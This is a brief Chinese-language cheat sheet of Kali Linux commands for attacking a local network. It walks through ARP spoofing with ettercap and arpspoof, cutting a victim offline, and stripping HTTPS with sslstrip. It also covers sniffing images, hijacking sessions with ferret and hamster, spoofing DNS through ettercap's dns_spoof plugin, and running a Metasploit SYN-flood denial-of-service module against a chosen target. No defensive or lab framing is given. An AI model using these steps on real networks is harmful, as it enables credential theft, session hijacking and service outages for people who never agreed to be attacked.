** 更改配置 Metasploit Kali Linux arp欺骗 ettercap session劫持 dns欺骗 arpspoof DOS攻击**

一、 更改配置 vi ./etc/Network-manager restart #修改false为ture service network-manager restart vi ./etc/ettercap/etter.conf ecuid/ecgid 全改成0 if you use iptables 后面内容去注释 *

二、arp欺骗、嗅探 (1)ettercap echo 1 >>/proc/sys/net/ipv4/ip_forward ettercap -i 网卡 -Tq -M arp:remote /目标IP/网关/ (也可以写作:// //) #局域网内全ip、所有网关 i:网卡 Tq:文本模式 只有ettercap可以抓取文字,且ettercap集成了DNS欺骗插件

(2)arpspoof echo 1 >>/proc/sys/net/ipv4/ip_forward arpspoof -i 网卡 -t 网关 目标IP
#通说是: 目标 网关

#断网 arpspoof -i 网卡 -t 网关 目标IP

实现欺骗后,嗅探:

#(嗅探)将https链接还原为http sslstrip -a -f -k

#查看图片 driftnet -i eth0

#session劫持 tcpdump -i eth0 -w qq.cap ferret -t qq.cap (64位下需要安装) hamster http://hamster

三、DNS劫持 (1)使用ettercap进行arp欺骗 (2)修改etter.dns文件 echo 1 >>/proc/sys/net/ipv4/ip_forward ettercap -i 网卡 -Tq -M arp:remote // //

vi /etc/ettercap/etter.dns

(3)启用dns_spoof 在运行中的ettercap中输入p

输入 dns_spoof 激活插件

四、DOS攻击(潮汐攻击) #进入Metasploit msfconsole #进入潮汐攻击目录 use auxiliary/dos/tcp/synflood 服务器地址 #show命令 显示需要填写(yes的必填)的内容 show options #set命令 写内容 set rhost 目标服务器 #执行 exploit 另外(防呆不防傻):

目标ip查询: fping -asg 192.168.自己IP位置(一般只有一位).0/24 网卡、ip查询: ipconfig (win) ifconfig (linux)